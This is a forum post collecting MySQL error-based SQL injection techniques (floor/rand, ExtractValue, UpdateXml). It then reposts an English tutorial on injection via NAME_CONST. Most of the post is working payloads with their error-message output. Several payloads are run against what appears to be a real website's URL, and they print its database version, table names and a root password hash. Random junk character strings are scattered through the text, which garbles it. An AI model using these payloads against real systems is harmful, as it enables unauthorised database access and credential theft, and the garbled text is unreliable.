|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:% u7 X( V6 }" D1 P2 e$ B4 T
首先进行正常查询: mysql> select * from article where id = 1;+ G$ F- i1 Y4 |
+—-+——-+———+
: B9 a. y3 i+ |( U4 k| id | title | content |( g7 z3 S+ X8 K, Z9 Y
+—-+——-+———+
$ r) e* p. O5 S8 s( X( ]* l| 1 | test | do it |
4 D" w5 [1 @" b+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
/ Y) p3 w V2 V, \( FERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
0 [) b! ~9 V# ^& o/ w+ r例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);. \8 D2 ~7 O) Q+ F" s+ _: y
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));+ \6 c' k1 k1 b( _
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
; K- G! S( B, i3 J6 d# q% m测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
/ o/ u2 [4 y' H: e8 U% o. hERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
# i+ Y) n4 R# r D
' o8 u! |8 w9 d0 ?+ k Z1 {$ o再收集: 4 y) S- z+ U6 s& `8 M
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
' A8 Q- _+ C. v2 d
3 e7 S H7 `6 |, E+ KError uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’' p9 Y H' R" ~. ^+ W
- E6 L5 ]# O! G, H0 f3 Whttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)+ Q* D6 I1 @% E4 j) a% s8 L3 O6 I
: Y' c% d5 j: O6 _Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ 6 f! P$ ~9 x& X+ B
! M9 x3 R r0 } O: P! Y
MYSQL高版本报错注入技巧-利用NAME_CONST注入- l9 n9 D7 i$ {% {+ W# n& ^% ?+ G9 Z
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
% l& m- X5 ~# ~' `5 J5 U1 l6 I; G+ T+ f
( ?! F0 x. d" ^! ?' G相关信息* O6 j, w7 f* ]# i6 Z) a
. V0 L. i# d4 ~' m' z, f; f2 @
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.# u+ z3 }0 [* S( S: P
2 O# {" g7 j( ]% v/ y, r4 {; [Code:
/ }4 }# }$ @) c( {$ D, rNAME_CONST(DATA, VALUE): r/ G5 ^1 k* K$ @
: f7 V4 E5 F" m! S% w+ w" p
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
) u" z. `& B$ z- q6 \4 k, v+ q& Q, B9 Q1 A; J, R
SELECT NAME_CONST('TEST', 1)9 K+ d; z4 m' Z6 M0 H; A( a3 r
8 G, S7 c' u! i# x# `+ h4 ~! k' _( |2 L
( j: n' i/ Z- |+ v* T0 O- K|---------------|/ K7 V4 n/ \ w2 P8 J$ U! c9 e
| TEST |8 s* b' X ^8 D9 e N3 d3 g
| |
: S7 I9 d0 r$ a: }, a; Y* I|---------------|
1 L7 m5 }$ }; {/ {! H! W; h$ W| 1 |( |; e0 e- o$ D" s1 @3 b, Y1 Z
| |
/ f9 A) @ `, B) H0 `1 r @! Q|---------------|- y0 q' O4 j3 O( s, A+ L# j3 o
+ W4 U! T% `2 U9 g
3 t0 ?5 i! W; Q% Z: s. N! ]
( ]3 d- T5 Q: c8 Y0 `; c9 U+ N+ {* i: q4 T7 P' ?% z- a2 J9 `6 Q
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
+ S e* G; T( I1 b8 E! GIntro to MySQL Variables9 \( k9 l# O& t
7 t( W! y1 u" Y2 S- G+ X2 ~" NOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
& ]# P# G/ h# }9 [) g' I9 P) P& i; @+ Q v1 ?
Code:0 R: K3 C0 y# `, I& R
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261' L0 ]- M+ N9 y8 _! m
R& w$ X! Z7 D% u
4 p' b) o" L+ }4 A6 [' Q/ h
* b* M2 Z& Y$ t- k5 C% `4 B' Y
$ g" o1 L7 A: N0 p5 T0 v
; D0 y8 O/ ~- o( UCode:
5 I0 h, p" J- {, F* b M( V6 H Sand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
! C, ?2 N" V8 n
7 } k G4 t, R/ @! T# K8 H
: `, F7 D/ `9 M% d1 X2 s0 `# KVAR = Your MySQL variable.
& F* o3 ~( V) X8 l# X+ ~' l& D! j/ o
& {7 @/ T3 ~% M. d2 v2 |MySQL 5.1.3 Server System Variables
3 E- ~( W+ i% I1 z
1 S! W7 j: d/ [0 p( r$ OLet's try it out on my site..
+ d( f# [6 Z( M& q8 F2 M. \9 y: A/ ~; |$ M% A$ B! g! p
Code:) E4 d- |/ Z( b: v9 x0 U3 F- w
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
/ s% w; N k4 t0 `0 b8 @5 M6 K1 {! B" S2 ]
Erroruplicate column name '5.0.27-community-nt'
9 N( R; N# N8 }. j: T3 D6 A# J) @% b5 Y1 A! f
" j7 ?* F7 W/ b# s) E1 [1 }, x
( @. Y; C& M6 Q" w' M" Q5 i
0 U5 Y2 d0 u2 {0 z& S$ ?& w( o/ }5 {& C$ \7 k d' i( r6 y2 V
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
8 z: A' Z- Q1 f- ^2 _; n* y: j( ^8 E
Data Extraction* Q- r% V! U+ r8 l( e0 l# l, e r
* D$ P% `8 s3 Y5 H% b
Code:0 h- x1 Q" s6 x! l
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--" t! r$ `8 o6 b2 U
* W9 ^% H' v, y% Y9 x2 e. Y# H
5 Z* S% i/ [: ?4 _6 z
We should get a duplicate column 1 error...+ s% e# }& f2 h6 I" |0 R$ x
, R+ _/ `7 m0 mCode:
8 t) J' H% K# M# c1 P7 O, nhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
; M; W2 p# M2 L
# z/ ~/ @/ A( E+ N) [Erroruplicate column name '1
( T! c" N. H) h0 e) S% M
7 ^& D: W& \' Q4 Z8 T- n2 ]" p
2 A7 N2 X3 X# h; q9 g2 M9 ` j# T' Q
/ K9 ~3 T( d2 f6 ^5 d' f% L+ @; f
8 f% D4 e" d6 d+ B9 C; o# j& {. i% l1 r
" p+ T3 h, K7 z) U0 m
Now let's get the tables out this bitch..( A) i5 A2 s. n3 s; r5 V1 i% G
+ l' e) U4 Z8 A6 b& D
Code:
5 o# T* [0 g* q+ V$ `+ L6 M' T# [+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--% a4 t7 E8 j) a) v' E
' m4 G! K' t7 W% i8 g$ i$ ?0 p3 w6 ^7 ?' R0 S0 f9 M/ E. M: X
Let's see if it works here, if it does, we can go on and finish the job.) ~4 G7 Z' f. p2 e9 z
4 y2 ~6 G- d( G' H$ UCode:
' { R! Z8 p) g) Mhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--7 Z6 n9 M( ^+ w; a. l3 l
9 k6 @$ [, }) O) [
- v. D5 y L# r+ `4 [Erroruplicate column name 'com_admanage
; T+ u. i) u* w: F! u: k; j, ~
, r9 C- i/ h% h& @( ~
- n% y, ]2 s! R; k; M4 Z8 e# ?# R3 j1 S7 U0 C
7 t* z1 F8 Y: F9 a0 {5 c. P' H
% j4 n$ p+ W9 n! G; b
, V- O( J& Y/ ENow I'm going to be lazy and use mysql.user as an example, just for the sake of time.
+ t' S6 d/ W+ R$ b3 }7 ^1 T3 a/ \! }: e. K+ A e2 b
Let's get the columns out of the user table.." t4 h" ^* C0 Q" M0 d+ M
+ G ?4 ]5 g, C4 p2 X# G
Code:$ S8 {, z/ k" z) k1 x
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--" W: q) X3 V0 Z7 O A
, `+ L$ ]5 {2 ^! [/ {$ Z
% M7 V4 }# M; R- hSo mine looks like this, and I get the duplicate column name 'Host'.
+ e3 h# c( y+ m, {, m5 E4 }
$ X4 f) ^3 U2 I* p! KCode:" v6 o$ M7 W+ _
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--9 z. {. [) [% D! A
6 f) X; f; x8 A L; E [
Erroruplicate column name 'Host'
2 {5 R# |; h9 ^4 H
+ R$ b% |0 D) g' m5 J
2 ], `6 m: ]$ n1 @* E# @! N+ x
4 B3 z/ F2 B. x9 M2 j& v* o
9 Z; Y, ]$ D! R: }0 H4 I# ]! v
; _+ V! U! _5 t. l1 g6 t$ P6 {: r1 j' @5 @! j
Woot, time to finish this bitch off.4 A# |% p# S4 V( w! h& O+ j( ]
v; S' j2 P& {( c& o# q
Code:' E1 Z, v1 E9 c+ J
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--( f/ o' H/ v- O. Z/ b
* ^8 u/ }! Z+ L: R1 C+ I/ L4 g% @$ R9 M5 r5 ~7 W
So mine looks like this...
; s3 n+ A$ z& {. n0 ]
) m8 W7 o3 e0 ECode:
! G$ [8 G& }( F7 qhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
- c. M" `' i5 N, `
) k+ @! K, ^2 B3 g9 R" WErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
& S& y/ S' i' {8 d& k0 u7 D* P% T6 n
s5 I& E8 h7 F/ C* n a! `1 G
' ~+ M3 P6 d; s% V4 U, J) {
" K5 F) C# X2 e: d& S6 F. P7 H5 D. r/ Z1 d; u8 f# v2 |" h
/ @0 ]& S5 L% n t
And there we have it, thanks for reading.1 z3 m& e1 _ P- J. _* d7 ?
! E% s6 l# L( f" k: e |
发表于 2015-11-11 19:03:37
收藏
支持
反对